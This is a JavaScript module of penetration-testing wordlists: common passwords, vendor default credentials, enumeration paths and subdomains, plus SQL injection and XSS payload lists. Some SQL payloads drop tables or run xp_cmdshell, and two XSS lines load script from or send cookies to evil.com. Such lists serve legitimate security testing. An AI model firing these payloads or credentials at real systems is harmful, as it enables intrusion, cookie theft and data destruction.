"use strict";

// ---------------------------------------------------------------------------
// wordlists.js -- Common wordlists for security testing and enumeration
// ---------------------------------------------------------------------------
// All entries are well-known public defaults sourced from open wordlists
// (SecLists, OWASP, vendor documentation).  No real secrets or API keys.
// ---------------------------------------------------------------------------

// ---- COMMON PASSWORDS (200+ weak / default passwords) --------------------

const COMMON_PASSWORDS = [
  // --- Top classics ---
  "password",
  "123456",
  "12345678",
  "123456789",
  "1234567890",
  "qwerty",
  "abc123",
  "password1",
  "admin",
  "letmein",
  "welcome",
  "monkey",
  "dragon",
  "master",
  "login",
  "princess",
  "football",
  "shadow",
  "sunshine",
  "trustno1",
  "iloveyou",
  "batman",
  "access",
  "hello",
  "charlie",
  "donald",
  "passw0rd",
  "whatever",
  "qazwsx",
  "michael",
  "121212",
  "000000",
  "111111",
  "654321",
  "666666",
  "696969",
  "777777",
  "888888",
  "987654321",
  "password123",
  "changeme",

  // --- Keyboard patterns ---
  "qwerty123",
  "qwertyuiop",
  "asdfghjkl",
  "zxcvbnm",
  "1qaz2wsx",
  "1q2w3e4r",
  "1q2w3e4r5t",
  "qwer1234",
  "asdf1234",
  "zxcvbn",
  "!@#$%^&*",
  "q1w2e3r4",
  "1234qwer",
  "qweasdzxc",
  "asdfjkl;",
  "1234asdf",
  "poiuytrewq",

  // --- Simple numeric ---
  "12345",
  "1234",
  "123123",
  "112233",
  "102030",
  "010203",
  "11111",
  "22222",
  "33333",
  "44444",
  "55555",
  "99999",
  "123321",
  "147258369",
  "159753",
  "0987654321",

  // --- Names / words ---
  "michael",
  "jordan",
  "ashley",
  "jessica",
  "thomas",
  "robert",
  "daniel",
  "andrew",
  "jennifer",
  "hunter",
  "harley",
  "george",
  "pepper",
  "ginger",
  "summer",
  "cookie",
  "buster",
  "maggie",
  "bailey",
  "buddy",
  "oliver",
  "tigger",
  "joshua",
  "william",
  "samantha",

  // --- Sports / teams ---
  "baseball",
  "soccer",
  "hockey",
  "lakers",
  "yankees",
  "cowboys",
  "eagles",
  "steelers",
  "rangers",
  "arsenal",
  "chelsea",
  "tennis",
  "cricket",
  "golf",

  // --- Seasons + years ---
  "summer2020",
  "summer2021",
  "summer2022",
  "summer2023",
  "summer2024",
  "winter2020",
  "winter2021",
  "winter2022",
  "winter2023",
  "winter2024",
  "spring2023",
  "spring2024",
  "fall2023",
  "fall2024",
  "autumn2023",
  "autumn2024",
  "january",
  "february",
  "march2024",
  "december2023",

  // --- Special-char variations ---
  "p@ssw0rd",
  "p@ssword",
  "P@ssw0rd",
  "P@ssword1",
  "P@$$w0rd",
  "Passw0rd!",
  "admin123!",
  "Welcome1!",
  "Welcome1",
  "Welcome123",
  "Qwerty123!",
  "Test1234!",
  "Temp1234!",
  "Password1!",
  "Pa55word",
  "pa55w0rd",
  "Adm1n!",
  "root123!",

  // --- Leet speak ---
  "l3tme1n",
  "h4ck3r",
  "h4x0r",
  "s3cur1ty",
  "p4ssw0rd",
  "adm1n",
  "r00t",
  "t3st",
  "d3fault",

  // --- Common defaults ---
  "admin",
  "root",
  "toor",
  "guest",
  "test",
  "user",
  "default",
  "pass",
  "temp",
  "public",
  "private",
  "secret",
  "server",
  "system",
  "operator",
  "manager",
  "supervisor",
  "administrator",

  // --- Pop culture ---
  "starwars",
  "superman",
  "spiderman",
  "minecraft",
  "pokemon",
  "naruto",
  "matrix",
  "gandalf",
  "batman",
  "ironman",
  "avengers",
  "thanos",
  "hogwarts",
  "mustang",
  "ferrari",
  "corvette",
  "mercedesbenz",

  // --- Misc common ---
  "computer",
  "internet",
  "security",
  "freedom",
  "america",
  "canada",
  "london",
  "paris",
  "berlin",
  "tokyo",
  "coffee",
  "chocolate",
  "diamond",
  "platinum",
  "midnight",
  "thunder",
  "phoenix",
  "elephant",
  "dolphin",
  "killer",
  "hammer",
  "blaster",
  "sniper",
  "ninja",
  "samurai",
  "pirate",
  "viking",
  "warrior",
  "legend",
  "champion",
  "alpha",
  "omega",
  "bravo",
  "delta",
  "charlie1",
  "foxtrot",
  "hotel",
  "tango",
  "zulu",
  "redhat",
  "debian",
  "ubuntu",
  "fedora",
];

// ---- COMMON DIRECTORIES (200+ web paths for directory enumeration) -------

const COMMON_DIRS = [
  // --- Admin panels ---
  "/admin",
  "/admin/",
  "/administrator",
  "/administrator/",
  "/admin/login",
  "/admin/dashboard",
  "/admin/panel",
  "/admin/config",
  "/admin/settings",
  "/admin/users",
  "/admincp",
  "/admin.php",
  "/admin.html",
  "/cpanel",
  "/dashboard",
  "/manage",
  "/management",
  "/manager",
  "/control",
  "/controlpanel",

  // --- Authentication ---
  "/login",
  "/login/",
  "/signin",
  "/signup",
  "/register",
  "/logout",
  "/auth",
  "/authenticate",
  "/oauth",
  "/oauth2",
  "/sso",
  "/cas",
  "/saml",
  "/password",
  "/password/reset",
  "/forgot",
  "/forgot-password",
  "/reset-password",
  "/2fa",
  "/mfa",

  // --- API endpoints ---
  "/api",
  "/api/",
  "/api/v1",
  "/api/v2",
  "/api/v3",
  "/api/v1/users",
  "/api/v1/admin",
  "/api/v1/auth",
  "/api/v1/login",
  "/api/v1/config",
  "/api/health",
  "/api/status",
  "/api/docs",
  "/api/swagger",
  "/api/graphql",
  "/graphql",
  "/rest",
  "/restapi",
  "/jsonrpc",
  "/xmlrpc",
  "/xmlrpc.php",
  "/soap",
  "/wsdl",

  // --- Version control ---
  "/.git",
  "/.git/config",
  "/.git/HEAD",
  "/.git/refs",
  "/.gitignore",
  "/.svn",
  "/.svn/entries",
  "/.hg",
  "/.bzr",
  "/.cvs",

  // --- Config / dotfiles ---
  "/.env",
  "/.env.local",
  "/.env.production",
  "/.env.development",
  "/.env.backup",
  "/.htaccess",
  "/.htpasswd",
  "/web.config",
  "/wp-config.php",
  "/wp-config.php.bak",
  "/config",
  "/config.php",
  "/config.yml",
  "/config.json",
  "/configuration",
  "/settings",
  "/settings.php",
  "/parameters.yml",

  // --- WordPress ---
  "/wp-admin",
  "/wp-admin/",
  "/wp-login.php",
  "/wp-content",
  "/wp-content/uploads",
  "/wp-content/plugins",
  "/wp-content/themes",
  "/wp-includes",
  "/wp-json",
  "/wp-cron.php",

  // --- CMS platforms ---
  "/joomla",
  "/joomla/administrator",
  "/drupal",
  "/drupal/admin",
  "/magento",
  "/magento/admin",
  "/typo3",
  "/umbraco",
  "/sitecore",
  "/sitefinity",

  // --- Database tools ---
  "/phpmyadmin",
  "/phpmyadmin/",
  "/pma",
  "/myadmin",
  "/mysql",
  "/mysqladmin",
  "/adminer",
  "/adminer.php",
  "/pgadmin",
  "/dbadmin",
  "/phpPgAdmin",
  "/redis",
  "/mongo",
  "/couchdb",

  // --- Backup / sensitive files ---
  "/backup",
  "/backup/",
  "/backups",
  "/bak",
  "/old",
  "/temp",
  "/tmp",
  "/cache",
  "/dump",
  "/db.sql",
  "/database.sql",
  "/backup.sql",
  "/backup.zip",
  "/backup.tar.gz",
  "/site.tar.gz",
  "/data.sql",
  "/export.sql",

  // --- Server info ---
  "/server-status",
  "/server-info",
  "/status",
  "/health",
  "/healthcheck",
  "/info",
  "/info.php",
  "/phpinfo",
  "/phpinfo.php",
  "/test",
  "/test.php",
  "/test.html",
  "/debug",
  "/debug/vars",
  "/trace",

  // --- Documentation ---
  "/docs",
  "/docs/",
  "/documentation",
  "/swagger",
  "/swagger-ui",
  "/swagger-ui.html",
  "/swagger.json",
  "/swagger.yaml",
  "/openapi",
  "/openapi.json",
  "/redoc",
  "/apidocs",

  // --- Common directories ---
  "/assets",
  "/static",
  "/public",
  "/media",
  "/uploads",
  "/files",
  "/images",
  "/img",
  "/css",
  "/js",
  "/scripts",
  "/fonts",
  "/icons",
  "/lib",
  "/vendor",
  "/node_modules",
  "/bower_components",
  "/packages",
  "/dist",
  "/build",
  "/bin",

  // --- Dev / staging ---
  "/dev",
  "/development",
  "/staging",
  "/stage",
  "/qa",
  "/testing",
  "/uat",
  "/sandbox",
  "/demo",
  "/beta",
  "/alpha",
  "/preview",
  "/canary",

  // --- CI/CD ---
  "/.github",
  "/.gitlab-ci.yml",
  "/.circleci",
  "/.travis.yml",
  "/Jenkinsfile",
  "/Dockerfile",
  "/docker-compose.yml",
  "/.dockerignore",

  // --- Misc ---
  "/robots.txt",
  "/sitemap.xml",
  "/humans.txt",
  "/security.txt",
  "/.well-known",
  "/.well-known/security.txt",
  "/crossdomain.xml",
  "/clientaccesspolicy.xml",
  "/favicon.ico",
  "/manifest.json",
  "/service-worker.js",
  "/sw.js",
  "/console",
  "/shell",
  "/terminal",
  "/cgi-bin",
  "/cgi-bin/",
  "/fcgi-bin",
  "/webdav",
  "/portal",
  "/intranet",
  "/internal",
  "/private",
  "/secret",
  "/hidden",
  "/archive",
  "/archives",
  "/logs",
  "/log",
  "/error_log",
  "/access_log",
  "/mail",
  "/email",
  "/webmail",
  "/roundcube",
  "/squirrelmail",
  "/horde",
  "/zimbra",
];

// ---- COMMON SUBDOMAINS (200+ enumeration targets) ------------------------

const COMMON_SUBDOMAINS = [
  // --- Standard ---
  "www",
  "mail",
  "ftp",
  "smtp",
  "pop",
  "pop3",
  "imap",
  "webmail",
  "email",
  "mx",
  "mx1",
  "mx2",
  "mx3",

  // --- Development ---
  "dev",
  "develop",
  "development",
  "dev1",
  "dev2",
  "dev3",
  "staging",
  "stage",
  "stg",
  "qa",
  "test",
  "testing",
  "uat",
  "sandbox",
  "demo",
  "beta",
  "alpha",
  "preview",
  "canary",
  "nightly",
  "release",
  "lab",
  "labs",
  "experimental",

  // --- API ---
  "api",
  "api1",
  "api2",
  "api3",
  "api-v1",
  "api-v2",
  "api-dev",
  "api-staging",
  "api-prod",
  "rest",
  "graphql",
  "gateway",
  "ws",
  "websocket",
  "grpc",
  "rpc",

  // --- Admin / management ---
  "admin",
  "administrator",
  "panel",
  "cpanel",
  "whm",
  "manage",
  "management",
  "manager",
  "console",
  "dashboard",
  "portal",
  "control",
  "controlpanel",
  "sysadmin",
  "webadmin",

  // --- Infrastructure ---
  "ns",
  "ns1",
  "ns2",
  "ns3",
  "ns4",
  "dns",
  "dns1",
  "dns2",
  "resolver",
  "proxy",
  "reverse",
  "lb",
  "loadbalancer",
  "balancer",
  "firewall",
  "fw",
  "waf",
  "gateway",

  // --- CDN / static ---
  "cdn",
  "cdn1",
  "cdn2",
  "cdn3",
  "static",
  "assets",
  "media",
  "images",
  "img",
  "img1",
  "img2",
  "files",
  "download",
  "downloads",
  "upload",
  "uploads",
  "content",

  // --- VPN / remote ---
  "vpn",
  "vpn1",
  "vpn2",
  "remote",
  "rdp",
  "ssh",
  "bastion",
  "jump",
  "jumpbox",
  "gateway",
  "access",
  "citrix",
  "ras",
  "connect",

  // --- Database ---
  "db",
  "db1",
  "db2",
  "db3",
  "database",
  "mysql",
  "postgres",
  "postgresql",
  "mongo",
  "mongodb",
  "redis",
  "elastic",
  "elasticsearch",
  "es",
  "solr",
  "cassandra",
  "couchdb",
  "mariadb",
  "mssql",
  "sql",

  // --- Cloud / services ---
  "cloud",
  "aws",
  "azure",
  "gcp",
  "s3",
  "storage",
  "blob",
  "bucket",
  "vault",
  "secrets",
  "config",
  "registry",
  "docker",
  "k8s",
  "kubernetes",
  "container",
  "containers",
  "cluster",

  // --- Monitoring / ops ---
  "monitor",
  "monitoring",
  "status",
  "health",
  "healthcheck",
  "nagios",
  "zabbix",
  "grafana",
  "prometheus",
  "kibana",
  "splunk",
  "datadog",
  "sentry",
  "newrelic",
  "logs",
  "log",
  "logging",
  "metrics",
  "telemetry",
  "apm",

  // --- CI/CD ---
  "ci",
  "cd",
  "build",
  "jenkins",
  "gitlab",
  "github",
  "bitbucket",
  "bamboo",
  "travis",
  "circleci",
  "drone",
  "teamcity",
  "artifactory",
  "nexus",
  "sonar",
  "sonarqube",
  "harbor",

  // --- Communication ---
  "chat",
  "slack",
  "teams",
  "meet",
  "conference",
  "jitsi",
  "matrix",
  "xmpp",
  "jabber",
  "irc",
  "forum",
  "forums",
  "community",
  "discuss",
  "support",
  "help",
  "helpdesk",
  "ticket",
  "tickets",
  "jira",
  "servicedesk",

  // --- Web apps ---
  "app",
  "apps",
  "web",
  "webapp",
  "www1",
  "www2",
  "www3",
  "m",
  "mobile",
  "shop",
  "store",
  "cart",
  "checkout",
  "pay",
  "payment",
  "billing",
  "invoice",
  "crm",
  "erp",
  "hr",
  "wiki",
  "docs",
  "blog",
  "news",
  "press",
  "marketing",
  "analytics",
  "track",
  "tracking",

  // --- Security ---
  "sso",
  "auth",
  "oauth",
  "login",
  "id",
  "identity",
  "ldap",
  "ad",
  "radius",
  "cas",
  "saml",
  "keycloak",
  "okta",
  "cert",
  "certs",
  "pki",
  "ca",
  "ocsp",
  "crl",

  // --- Geo / region ---
  "us",
  "eu",
  "uk",
  "de",
  "fr",
  "jp",
  "cn",
  "au",
  "ca",
  "in",
  "br",
  "east",
  "west",
  "north",
  "south",
  "asia",
  "emea",
  "apac",
  "latam",
];

// ---- DEFAULT CREDENTIALS (100+ service defaults) -------------------------

const DEFAULT_CREDS = [
  // --- Routers / networking ---
  { service: "Cisco IOS",          username: "admin",     password: "admin" },
  { service: "Cisco IOS",          username: "cisco",     password: "cisco" },
  { service: "Cisco IOS",          username: "admin",     password: "cisco" },
  { service: "Linksys Router",     username: "admin",     password: "admin" },
  { service: "Linksys Router",     username: "",          password: "admin" },
  { service: "Netgear Router",     username: "admin",     password: "password" },
  { service: "Netgear Router",     username: "admin",     password: "1234" },
  { service: "TP-Link Router",     username: "admin",     password: "admin" },
  { service: "D-Link Router",      username: "admin",     password: "" },
  { service: "D-Link Router",      username: "admin",     password: "admin" },
  { service: "Asus Router",        username: "admin",     password: "admin" },
  { service: "Belkin Router",      username: "",          password: "" },
  { service: "ZTE Router",         username: "admin",     password: "admin" },
  { service: "Huawei Router",      username: "admin",     password: "admin" },
  { service: "MikroTik Router",    username: "admin",     password: "" },
  { service: "Ubiquiti UniFi",     username: "ubnt",      password: "ubnt" },
  { service: "Juniper",            username: "root",      password: "root123" },
  { service: "Aruba",              username: "admin",     password: "admin" },
  { service: "Fortinet FortiGate", username: "admin",     password: "" },
  { service: "Palo Alto PAN-OS",   username: "admin",     password: "admin" },
  { service: "SonicWall",          username: "admin",     password: "password" },
  { service: "pfSense",            username: "admin",     password: "pfsense" },
  { service: "OPNsense",           username: "root",      password: "opnsense" },

  // --- Databases ---
  { service: "MySQL",              username: "root",      password: "" },
  { service: "MySQL",              username: "root",      password: "root" },
  { service: "MySQL",              username: "root",      password: "mysql" },
  { service: "MySQL",              username: "root",      password: "toor" },
  { service: "PostgreSQL",         username: "postgres",  password: "postgres" },
  { service: "PostgreSQL",         username: "postgres",  password: "" },
  { service: "PostgreSQL",         username: "admin",     password: "admin" },
  { service: "MongoDB",            username: "admin",     password: "admin" },
  { service: "MongoDB",            username: "",          password: "" },
  { service: "Redis",              username: "",          password: "" },
  { service: "Redis",              username: "",          password: "redis" },
  { service: "Microsoft SQL",      username: "sa",        password: "sa" },
  { service: "Microsoft SQL",      username: "sa",        password: "" },
  { service: "Microsoft SQL",      username: "sa",        password: "Password1" },
  { service: "Oracle DB",          username: "sys",       password: "change_on_install" },
  { service: "Oracle DB",          username: "system",    password: "manager" },
  { service: "Oracle DB",          username: "scott",     password: "tiger" },
  { service: "CouchDB",            username: "admin",     password: "admin" },
  { service: "Cassandra",          username: "cassandra", password: "cassandra" },
  { service: "Elasticsearch",      username: "elastic",   password: "changeme" },
  { service: "InfluxDB",           username: "admin",     password: "admin" },
  { service: "Neo4j",              username: "neo4j",     password: "neo4j" },

  // --- CMS platforms ---
  { service: "WordPress",          username: "admin",     password: "admin" },
  { service: "WordPress",          username: "admin",     password: "password" },
  { service: "Joomla",             username: "admin",     password: "admin" },
  { service: "Drupal",             username: "admin",     password: "admin" },
  { service: "Magento",            username: "admin",     password: "123123" },
  { service: "TYPO3",              username: "admin",     password: "password" },
  { service: "Concrete5",          username: "admin",     password: "password" },
  { service: "Moodle",             username: "admin",     password: "admin" },
  { service: "MediaWiki",          username: "WikiSysop", password: "password" },

  // --- Web servers / panels ---
  { service: "Apache Tomcat",      username: "tomcat",    password: "tomcat" },
  { service: "Apache Tomcat",      username: "admin",     password: "admin" },
  { service: "Apache Tomcat",      username: "manager",   password: "manager" },
  { service: "Apache Tomcat",      username: "tomcat",    password: "s3cret" },
  { service: "JBoss",              username: "admin",     password: "admin" },
  { service: "GlassFish",          username: "admin",     password: "adminadmin" },
  { service: "WebLogic",           username: "weblogic",  password: "weblogic" },
  { service: "WebLogic",           username: "weblogic",  password: "welcome1" },
  { service: "cPanel",             username: "root",      password: "password" },
  { service: "Plesk",              username: "admin",     password: "setup" },
  { service: "Webmin",             username: "root",      password: "root" },

  // --- Monitoring / DevOps ---
  { service: "Grafana",            username: "admin",     password: "admin" },
  { service: "Nagios",             username: "nagiosadmin", password: "nagios" },
  { service: "Zabbix",             username: "Admin",     password: "zabbix" },
  { service: "Jenkins",            username: "admin",     password: "admin" },
  { service: "Jenkins",            username: "admin",     password: "password" },
  { service: "Kibana",             username: "elastic",   password: "changeme" },
  { service: "Splunk",             username: "admin",     password: "changeme" },
  { service: "Prometheus",         username: "admin",     password: "admin" },
  { service: "SonarQube",          username: "admin",     password: "admin" },
  { service: "Portainer",          username: "admin",     password: "admin" },
  { service: "Rancher",            username: "admin",     password: "admin" },
  { service: "Ansible Tower",      username: "admin",     password: "password" },

  // --- IoT / cameras ---
  { service: "Hikvision Camera",   username: "admin",     password: "12345" },
  { service: "Dahua Camera",       username: "admin",     password: "admin" },
  { service: "Axis Camera",        username: "root",      password: "pass" },
  { service: "Foscam Camera",      username: "admin",     password: "" },
  { service: "Samsung DVR",        username: "admin",     password: "4321" },
  { service: "Bosch Camera",       username: "admin",     password: "admin" },
  { service: "Reolink Camera",     username: "admin",     password: "" },
  { service: "Raspberry Pi",       username: "pi",        password: "raspberry" },
  { service: "Arduino Yun",        username: "root",      password: "arduino" },
  { service: "Philips Hue Bridge", username: "",          password: "" },

  // --- FTP / SSH ---
  { service: "FTP (generic)",      username: "anonymous", password: "anonymous" },
  { service: "FTP (generic)",      username: "anonymous", password: "" },
  { service: "FTP (generic)",      username: "ftp",       password: "ftp" },
  { service: "SSH (generic)",      username: "root",      password: "root" },
  { service: "SSH (generic)",      username: "root",      password: "toor" },
  { service: "SSH (generic)",      username: "admin",     password: "admin" },
  { service: "ProFTPD",            username: "ftp",       password: "ftp" },
  { service: "vsftpd",             username: "anonymous", password: "" },

  // --- VPN / remote access ---
  { service: "OpenVPN",            username: "admin",     password: "admin" },
  { service: "SonicWall VPN",      username: "admin",     password: "password" },
  { service: "Cisco VPN",          username: "admin",     password: "admin" },
  { service: "WatchGuard VPN",     username: "admin",     password: "readwrite" },

  // --- Virtualization ---
  { service: "VMware ESXi",        username: "root",      password: "vmware" },
  { service: "VMware vCenter",     username: "administrator@vsphere.local", password: "Admin!23" },
  { service: "Proxmox",            username: "root",      password: "proxmox" },
  { service: "VirtualBox",         username: "admin",     password: "admin" },
  { service: "Hyper-V",            username: "Administrator", password: "password" },

  // --- Printers ---
  { service: "HP Printer",         username: "admin",     password: "admin" },
  { service: "Xerox Printer",      username: "admin",     password: "1111" },
  { service: "Brother Printer",    username: "admin",     password: "access" },
  { service: "Epson Printer",      username: "epson",     password: "epson" },
  { service: "Canon Printer",      username: "ADMIN",     password: "canon" },
  { service: "Ricoh Printer",      username: "admin",     password: "" },
  { service: "Konica Minolta",     username: "admin",     password: "administrator" },
  { service: "Lexmark Printer",    username: "admin",     password: "" },

  // --- Email ---
  { service: "Postfix",            username: "admin",     password: "admin" },
  { service: "Zimbra",             username: "admin",     password: "admin" },
  { service: "Roundcube",          username: "admin",     password: "password" },
  { service: "hMailServer",        username: "Administrator", password: "" },
];

// ---- SQL INJECTION PAYLOADS (50+ test strings) ---------------------------

const SQLI_PAYLOADS = [
  // --- Basic auth bypass ---
  "' OR 1=1--",
  "' OR '1'='1",
  "' OR '1'='1'--",
  "' OR '1'='1'/*",
  "' OR 1=1#",
  "' OR 1=1/*",
  "' OR 'x'='x",
  "') OR ('1'='1",
  "') OR ('1'='1'--",
  "') OR 1=1--",
  "\" OR 1=1--",
  "\" OR \"1\"=\"1",
  "admin'--",
  "admin' #",
  "admin'/*",
  "' OR 1=1 LIMIT 1--",
  "1' OR '1'='1",
  "1 OR 1=1",
  "1' OR 1=1--",
  "' OR ''='",

  // --- UNION-based ---
  "' UNION SELECT NULL--",
  "' UNION SELECT NULL,NULL--",
  "' UNION SELECT NULL,NULL,NULL--",
  "' UNION SELECT 1,2,3--",
  "' UNION SELECT username,password FROM users--",
  "1' UNION SELECT 1,@@version--",
  "' UNION ALL SELECT NULL--",
  "' UNION ALL SELECT 1,2,3,4--",
  "' UNION SELECT table_name,NULL FROM information_schema.tables--",
  "' UNION SELECT column_name,NULL FROM information_schema.columns--",

  // --- Error-based ---
  "' AND 1=CONVERT(int,(SELECT @@version))--",
  "' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--",
  "' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--",
  "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
  "' AND 1=1 AND 'a'='a",
  "' AND 1=2 AND 'a'='a",
  "' AND SLEEP(5)--",
  "' AND BENCHMARK(5000000,MD5('test'))--",

  // --- Time-based blind ---
  "'; WAITFOR DELAY '0:0:5'--",
  "' OR SLEEP(5)--",
  "' OR SLEEP(5)#",
  "1' AND SLEEP(5)--",
  "1' AND SLEEP(5)#",
  "'; SELECT SLEEP(5)--",
  "' OR pg_sleep(5)--",
  "1; WAITFOR DELAY '0:0:5'--",

  // --- Boolean blind ---
  "' AND 1=1--",
  "' AND 1=2--",
  "' AND SUBSTRING(@@version,1,1)='5'--",
  "' AND (SELECT COUNT(*) FROM users)>0--",
  "' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--",

  // --- Stacked queries ---
  "'; DROP TABLE users--",
  "'; INSERT INTO users VALUES('hacker','hacker')--",
  "'; UPDATE users SET password='hacked' WHERE username='admin'--",
  "'; EXEC xp_cmdshell('whoami')--",
  "'; EXEC sp_configure 'show advanced options',1--",

  // --- Encoding / bypass ---
  "%27%20OR%201%3D1--",
  "%27%20UNION%20SELECT%20NULL--",
  "' /*!50000OR*/ 1=1--",
  "' OR/**/ 1=1--",
  "' %4fR 1=1--",
  "'+OR+1=1--",
  "' || 1=1--",
  "' && 1=1--",

  // --- NoSQL injection ---
  "{ \"$gt\": \"\" }",
  "{ \"$ne\": null }",
  "{ \"$regex\": \".*\" }",
  "' || '1'=='1",
  "'; return true; var dummy='",
  "true, $where: '1 == 1'",
];

// ---- XSS PAYLOADS (50+ test strings) ------------------------------------

const XSS_PAYLOADS = [
  // --- Basic script tags ---
  "<script>alert(1)</script>",
  "<script>alert('XSS')</script>",
  "<script>alert(document.cookie)</script>",
  "<script>alert(document.domain)</script>",
  "<script>confirm(1)</script>",
  "<script>prompt(1)</script>",
  "<script src=//evil.com/xss.js></script>",
  "<script>new Image().src='http://evil.com/?c='+document.cookie</script>",

  // --- Event handlers ---
  "<img src=x onerror=alert(1)>",
  "<img src=x onerror=alert('XSS')>",
  "<img src=x onerror=alert(document.cookie)>",
  "<svg onload=alert(1)>",
  "<svg/onload=alert(1)>",
  "<body onload=alert(1)>",
  "<input onfocus=alert(1) autofocus>",
  "<input onblur=alert(1) autofocus><input autofocus>",
  "<marquee onstart=alert(1)>",
  "<details open ontoggle=alert(1)>",
  "<video src=x onerror=alert(1)>",
  "<audio src=x onerror=alert(1)>",
  "<iframe onload=alert(1)>",
  "<object data=javascript:alert(1)>",
  "<embed src=javascript:alert(1)>",
  "<select onfocus=alert(1) autofocus>",
  "<textarea onfocus=alert(1) autofocus>",
  "<keygen onfocus=alert(1) autofocus>",
  "<isindex type=image src=1 onerror=alert(1)>",
  "<form><button formaction=javascript:alert(1)>click</button>",

  // --- Anchor / href ---
  "<a href=javascript:alert(1)>click</a>",
  "<a href='javascript:alert(1)'>click</a>",
  "<a href=\"javascript:alert(1)\">click</a>",
  "<a href=javascript:void(0) onclick=alert(1)>click</a>",

  // --- Data URIs ---
  "<a href=data:text/html,<script>alert(1)</script>>click</a>",
  "<iframe src=data:text/html,<script>alert(1)</script>>",
  "<object data=data:text/html,<script>alert(1)</script>>",

  // --- Encoding bypasses ---
  "<script>alert(String.fromCharCode(88,83,83))</script>",
  "<img src=x onerror=alert(String.fromCharCode(88,83,83))>",
  "&#60;script&#62;alert(1)&#60;/script&#62;",
  "&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
  "<scr<script>ipt>alert(1)</scr</script>ipt>",
  "<scr%69pt>alert(1)</scr%69pt>",
  "%3Cscript%3Ealert(1)%3C/script%3E",
  "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
  "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",

  // --- SVG-based ---
  "<svg><script>alert(1)</script></svg>",
  "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
  "<svg><set onbegin=alert(1) attributename=x to=1>",
  "<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=javascript:alert(1)><rect width=100 height=100 /></a></svg>",

  // --- Template injection / framework ---
  "{{constructor.constructor('alert(1)')()}}",
  "{{7*7}}",
  "${alert(1)}",
  "${7*7}",
  "#{7*7}",
  "<%= 7*7 %>",
  "{{config.items()}}",
  "{{self.__init__.__globals__}}",

  // --- Filter bypass variants ---
  "<img/src=x onerror=alert(1)>",
  "<img \t src=x \t onerror=alert(1)>",
  "<img src=x onerror='alert(1)'>",
  "<img src=x onerror=\"alert(1)\">",
  "<IMG SRC=x ONERROR=alert(1)>",
  "<iMg SrC=x OnErRoR=alert(1)>",
  "<img src=x onerror=a]lert(1)>".replace("]", ""),
  "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//",

  // --- DOM-based ---
  "javascript:alert(document.domain)",
  "javascript:alert(1)//",
  "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",

  // --- Polyglots ---
  "'\"><img src=x onerror=alert(1)>",
  "'\"><svg/onload=alert(1)>",
  "'-alert(1)-'",
  "\"-alert(1)-\"",
  "';alert(1)//",
  "\";alert(1)//",
  "</script><script>alert(1)</script>",
  "*/alert(1)/*",
  "--><script>alert(1)</script>",
  "<!--<script>alert(1)</script>-->",
];

// ---------------------------------------------------------------------------

module.exports = {
  COMMON_PASSWORDS,
  COMMON_DIRS,
  COMMON_SUBDOMAINS,
  DEFAULT_CREDS,
  SQLI_PAYLOADS,
  XSS_PAYLOADS,
};
